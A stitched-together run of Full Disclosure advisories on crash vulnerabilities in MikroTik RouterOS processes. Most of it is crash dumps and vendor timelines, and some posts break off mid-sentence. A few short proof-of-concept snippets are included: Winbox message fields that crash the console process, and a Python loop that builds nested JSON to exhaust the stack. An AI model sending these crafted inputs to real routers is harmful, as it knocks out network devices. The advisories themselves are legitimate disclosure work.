/lib/libucrypto.so 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-14:51:29.81@0: 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f 2020.06.04-14:51:29.81@0: 2020.06.04-14:51:29.81@0: code: 0x776a51e5 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8 This vulnerability was initially found in stable 6.46.3, and was fixed in stable 6.47. 2. division by zero The netwatch process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to arithmetic exception. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch 2020.06.04-16:25:57.65@0: --- signal=8 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x ebp=0x73f8 esp=0x73b0 2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 ecx=0x edx=0x 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: maps: 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00:1a 14 /ram/pckg/advanced-tools/nova/bin/netwatch 2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: stack: 0x8000 - 0x73b0 2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff 7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00 2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc 77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77 2020.06.04-16:25:57.65@0: 2020.06.04-16:25:57.65@0: code: 0x804c6d7 2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec 0c This vulnerability was initially found in stable 6.46.2, and was fixed in stable 6.47. 3. memory corruption The wireless process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the wireless process due to invalid memory
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. NULL pointer dereference The igmpproxy process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the igmpproxy process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy 2020.06.04-17:44:27.12@0: --- signal=11 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8 esp=0x7fa9326c 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b edx=0x 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: maps: 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 /ram/pckg/multicast/nova/bin/igmpproxy 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f 2020.06.04-17:44:27.12@0: 2020.06.04-17:44:27.12@0: code: 0x8050a8d 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c 0f This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. 2. reachable assertion failure The ipsec process suffers from an assertion failure vulnerability. There is a reachable assertion in the ipsec process. By sending a crafted packet, an authenticated remote user can crash the ipsec process due to assertion failure. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec 2020.06.04-18:25:16.04@0: --- signal=6 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291 edx=0x0006 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: maps: 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 /ram/pckg/security/nova/bin/ipsec 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so 2020.06.04-18:25:16.04@0: 774bb000-774d r-xp 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so 2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00:0c 951 /lib/liburadius.so 2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00:0c 956 /lib/libssl.so.1.0.0 2020.06.04-18:25:16.04@0: 77528000-7753 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp 00:0c 947 /lib/libucrypto.so 2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0 2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-18:25:16.04@0: 2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448 2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. Memory corruption vulnerability The diskd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the diskd process due to invalid memory access. Against stable 6.44.3, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: /nova/bin/diskd 2020.06.04-14:18:22.55@0: --- signal=11 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: maps: 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00:0c 1131 /nova/bin/diskd 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00:0c 996 /lib/libuClibc-0.9.33.2.so 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00:0c 992 /lib/libgcc_s.so.1 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00:0c 976 /lib/libuc++.so 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00:0c 982 /lib/libubox.so 2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp 00:0c 978 /lib/libumsg.so 2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp 00:0c 990 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c 2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20 2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00 2020.06.04-14:18:22.55@0: 2020.06.04-14:18:22.55@0: code: 0x776cd1db 2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 This vulnerability was initially found in long-term 6.44.5, and has been fixed in stable 6.47. 2. NULL pointer dereference vulnerability The graphing process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the graphing process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: /nova/bin/graphing 2020.06.04-15:12:41.47@0: --- signal=11 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202 2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8 esp=0x7fa8acb0 2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x edx=0x08061ce8 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: maps: 2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp 00:0c 1038 /nova/bin/graphing 2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp 00:0c 961 /lib/libm-0.9.33.2.so 2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0 2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00 00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08 2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b 77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08 2020.06.04-15:12:41.47@0: 2020.06.04-15:12:41.47@0: code: 0x80521e2 2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b 56 This vulnerability was initially found in long-term 6.44.6, and has been fixed in stable 6.47. 3. Stack exhaustion vulnerability The net process suffers from a stack exhaustion vulnerability. By sending a crafted packet to the net process, an authenticated remote user can trigger a stack
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: through stable 6.47 Fixed Versions: stable 6.47 Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These four vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities. PS: The following three memory corruption vulnerabilities are different. 1. NULL pointer dereference vulnerability The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: /nova/bin/lcdstat 2020.06.04-15:32:04.67@0: --- signal=11 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202 2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4 2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c edx=0x0001 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: maps: 2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat 2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-15:32:04.67@0: 77736000-7775 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-15:32:04.67@0: 77751000-7776 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4 2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f 2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f 2020.06.04-15:32:04.67@0: 2020.06.04-15:32:04.67@0: code: 0x805a26e 2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4 2. NULL pointer dereference vulnerability The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the lcdstat process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: /nova/bin/lcdstat 2020.06.04-15:48:13.77@0: --- signal=11 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246 2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff ebp=0x7fd8cb48 esp=0x7fd8cb2c 2020.06.04-15:48:13.77@0: eax=0x ebx=0x ecx=0x edx=0x 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: maps: 2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00:0c 1054 /nova/bin/lcdstat 2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-15:48:13.77@0: 7772b000-7000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-15:48:13.77@0: d000-77784000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c 2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00 00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f 2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77 77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08 2020.06.04-15:48:13.77@0: 2020.06.04-15:48:13.77@0: code: 0x80562c6 2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02 05 3. NULL pointer dereference vulnerability The lcdstat process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: until stable 6.45.7 (first vulnerability), until stable 6.46.4 (second vulnerability) Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second vulnerability) Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS stable release tree when found. Maybe other release trees also suffer from these vulnerabilities. 1. The cerm process suffers from an uncontrolled resource consumption issue. By sending a crafted packet, an authenticated remote user can cause a high cpu load, which may make the device respond slowly or unable to respond. 2. The traceroute process suffers from a memory corruption issue. By sending a crafted packet, an authenticated remote user can crash the traceroute process due to invalid memory access. Solution Upgrade to the corresponding latest RouterOS tree version. References == [1] https://mikrotik.com/download/changelogs/stable-release-tree ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers from these two vulnerabilities. Details === Product: MikroTik's RouterOS Affected Versions: through 6.46.5 (stable release tree) Fixed Versions: - Vendor URL: https://mikrotik.com/ Vendor Status: not fix yet CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Poc === The following pocs are based on the tool routeros ( https://github.com/tenable/routeros) 1) memory corruption in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe000c, -1); msg.add_u32(9, 9); 2) assertion failure in console process WinboxMessage msg; msg.set_to(48, 4); msg.set_command(0xfe0005); msg.add_u32(0xfe0001, 0); Disclosure timeline === 2019/08/23reported the 2nd issue to the vendor 2019/08/26reported the 1st issue to the vendor 2019/08/28vendor reproduced the 1st issue and will fix it as soon as possible 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as possible 2019/12/02notified the vendor the 1st issue still exists in version 6.44.6 (2nd issue fixed) 2020/01/06no response from the vendor, and did the initial disclosure 2020/04/14re-tested these two issues against the stable 6.46.5, and updated the disclosure Q C 于2020年1月6日周一 下午7:32写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: before 6.44.6 (Long-term release tree) > Fixed Versions: 6.44.6 (Long-term release tree) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > long-term release tree when found. Maybe other release trees also suffer > from these issues. > > 1. The console process suffers from a memory corruption issue. > An authenticated remote user can crash the console process due to a NULL > pointer reference by sending a crafted packet. > > 2. The console process suffers from an assertion failure issue. There is a > reachable assertion in the console process. An authenticated remote user > can crash the console process duo to assertion failure by sending a crafted > packet. > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/long-term-release-tree > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: before 6.44.6 (Long-term release tree) Fixed Versions: 6.44.6 (Long-term release tree) Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS long-term release tree when found. Maybe other release trees also suffer from these issues. 1. The console process suffers from a memory corruption issue. An authenticated remote user can crash the console process due to a NULL pointer reference by sending a crafted packet. 2. The console process suffers from an assertion failure issue. There is a reachable assertion in the console process. An authenticated remote user can crash the console process duo to assertion failure by sending a crafted packet. Solution Upgrade to the corresponding latest RouterOS tree version. References == [1] https://mikrotik.com/download/changelogs/long-term-release-tree ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: before 6.44.5 (Long-term release tree), before 6.45.1 (Stable release tree) Fixed Versions: 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree) Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree Vendor Status: fixed version released CVE: CVE-2019-13954, CVE-2019-13955 Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Details of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS 6.42.11 and 6.43.16 (Long-term release tree) when found. 1. CVE-2019-13954: memory exhaustion via a crafted POST request This vulnerability is similiar to the CVE-2018-1157. An authenticated user can cause the www binary to consume all memory via a crafted POST request to /jsproxy/upload. It's because of the incomplete fix for the CVE-2018-1157. Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really appreciate!), crafting a filename ending with many '\x00' can bypass the original fix to trigger the vulnerability. 2. CVE-2019-13955: stack exhaustion via recuring parsing of JSON This vulnerability is similar to the CVE-2018-1158. An authenticated user communicating with the www binary can trigger a stack exhaustion vulnerability via recursive parsing of JSON containing message type M. Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really appreciate!), crafting an JSON message with type M can trigger the vulnerability. A simple python script to generate the crafted message is as follows. msg = "{M01:[M01:[]]}" for _ in xrange(2000): msg = msg.replace('[]', "[M01:[]]") Solution Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree). References == [1] https://mikrotik.com/download/changelogs/long-term-release-tree [2] https://github.com/tenable/routeros ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/